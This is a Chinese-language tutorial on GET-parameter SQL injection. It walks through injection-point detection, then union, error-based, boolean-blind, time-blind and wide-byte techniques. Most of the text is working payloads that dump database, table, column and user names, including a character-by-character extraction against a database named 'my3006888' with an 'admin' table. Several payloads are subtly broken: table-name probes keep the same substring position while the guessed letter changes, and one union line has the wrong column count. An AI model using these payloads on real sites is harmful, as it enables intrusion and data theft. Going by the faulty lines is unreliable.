GET型sql注入基础(二)

注入点判断（举例说明）

整形

?id=1  //开始页面
?id=1  and 1=1  页面显示正常
?id=1  and 1=2  页面显示异常

字符型

?id=1  //开始页面
?id=1" and 1=1 --+  页面显示正常  
?id=1" and 1=2 --+  页面显示异常 //闭合方式可能是 '     "     ')     ")    '))  等   

示例：
?id=71 //页面显示正常

?id=71’ //页面异常

?id=71’–+ //页面恢复正常说明存在sql注入且闭合方式为单引号闭合

注入类型

联合查询 （有显示位）

判断列数order by 6 --+      //假设有6个
判断显示位select 1,2,3,4,5,6 --+  //假设在2
union select 1,database(),2,3,4,5,6 --+ //假设数据库为security
union select 1,(select group_concat(table_name) from INFORMATION_schema.tables where table_schema='security'),3,4,5,6 --+  //得知表名user
union select 1,(select group_concat(column_name) from INFORMATION_SCHEMA.columns where table_name='user' and table_schema='security'),3,4,5,6 --+
union select 1,(select group_concat(username) from user),3,4,5,6 --+    爆出内容

报错注入 （无显示位，有sql语句执行错误信息 ）

and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)

布尔盲注（页面回显有区别）

length(database())=9
178 and ascii(substr(database(),1,1))=109  m
178 and ascii(substr(database(),2,1))=121   y      
178 and ascii(substr(database(),3,1))=51     3    
178 and ascii(substr(database(),4,1))=48     0   
178 and ascii(substr(database(),5,1))=48     0 
178 and ascii(substr(database(),6,1))=54     6  
178 and ascii(substr(database(),7,1))=56     8   
178 and ascii(substr(database(),8,1))=56     8   
178 and ascii(substr(database(),9,1))=56     8   
数据库名:  my3006888
178 and (select length(table_name) from information_schema.tables where table_schema='my3006888' limit 0,1)=5
my3006888第一个表长度为5
178 and (select ascii(substr((select table_name from information_schema.tables where    table_schema='my3006888' limit 0,1),1,1)))=97    a
178 and (select ascii(substr((select table_name from information_schema.tables where    table_schema='my3006888' limit 0,1),1,1)))=100    d
178 and (select ascii(substr((select table_name from information_schema.tables where    table_schema='my3006888' limit 0,1),1,1)))=109    m
178 and (select ascii(substr((select table_name from information_schema.tables where    table_schema='my3006888' limit 0,1),1,1)))=105    i
178 and (select ascii(substr((select table_name from information_schema.tables where    table_schema='my3006888' limit 0,1),1,1)))=110    n
第一个表名为admin
178 and (select length(column_name) from information_schema.columns where table_schema='my3006888'  and table_name='admin' limit 0,1)=2
178 and (select ascii(substr((select column_name from information_schema.columns where    table_schema='my3006888'  and table_name='admin' limit 0,1),1,1)))=105   i
178 and (select ascii(substr((select column_name from information_schema.columns where    table_schema='my3006888'  and table_name='admin' limit 0,1),1,1)))=100   d
admin表第一个字段为id

时间盲注 （页面回显相同，无显示位）

 and if((length(database())>5),sleep(10),0)  //不执行
 and if((length(database())=3),sleep(10),0)   //执行，说明数据库长度为3
 and if((ascii(substr(database(),1,1))=99),sleep(10),0) //第一个字母为c
 。。。如上

宽字节注入 (\ 数据库gbk)

%df